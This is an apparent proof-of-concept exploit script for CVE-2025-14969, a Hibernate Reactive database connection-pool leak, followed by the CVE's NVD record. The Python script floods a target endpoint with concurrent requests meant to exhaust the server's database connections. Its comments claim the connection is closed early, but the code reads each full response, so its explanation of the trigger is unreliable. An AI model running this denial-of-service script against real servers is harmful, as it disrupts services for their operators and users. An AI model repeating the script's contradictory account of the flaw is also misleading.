CVE-2025-14969

import asyncio import aiohttp import time async def exploit_connection_leak(target_url, num_requests=100): """ PoC for CVE-2025-14969: Hibernate Reactive Connection Pool Leak This script demonstrates how premature connection termination can leak database connections. """ async with aiohttp.ClientSession() as session: tasks = [] for i in range(num_requests): # Create task that will close connection prematurely task = make_request_with_early_close(session, target_url, i) tasks.append(task) # Execute all requests concurrently to maximize connection leak await asyncio.gather(*tasks, return_exceptions=True) async def make_request_with_early_close(session, url, request_id): """ Make HTTP request and close connection before response completes. This simulates the behavior that triggers connection pool leak in Hibernate Reactive. """ try: async with session.get(url, timeout=aiohttp.ClientTimeout(total=30)) as response: # Close connection immediately after getting initial response # This is where the vulnerability is triggered await response.read() # Intentionally close before processing completes return {"id": request_id, "status": "closed_early"} except Exception as e: # Connection closed or error occurred return {"id": request_id, "status": "error", "error": str(e)} if __name__ == "__main__": # Target vulnerable endpoint target = "http://vulnerable-app.com/api/users" print(f"[*] Starting CVE-2025-14969 exploitation...") print(f"[*] Target: {target}") print(f"[*] Sending 100 requests with early connection close...") start_time = time.time() asyncio.run(exploit_connection_leak(target, num_requests=100)) elapsed = time.time() - start_time print(f"[*] Completed in {elapsed:.2f} seconds") print(f"[*] Check connection pool exhaustion on target server")

{"cve": {"id": "CVE-2025-14969", "sourceIdentifier": "[email protected]", "published": "2026-01-26T20:16:08.313", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Hibernate Reactive. When an HTTP endpoint is exposed to perform database operations, a remote client can prematurely close the HTTP connection. This action may lead to leaking connections from the database connection pool, potentially causing a Denial of Service (DoS) by exhausting available database connections."}, {"lang": "es", "value": "Se encontró una vulnerabilidad en Hibernate Reactive. Cuando un endpoint HTTP está expuesto para realizar operaciones de base de datos, un cliente remoto puede cerrar prematuramente la conexión HTTP. Esta acción puede provocar la fuga de conexiones del pool de conexiones de la base de datos, lo que podría causar una denegación de servicio (DoS) al agotar las conexiones de base de datos disponibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-772"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:1965", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-14969", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2423822", "source": "[email protected]"}]}}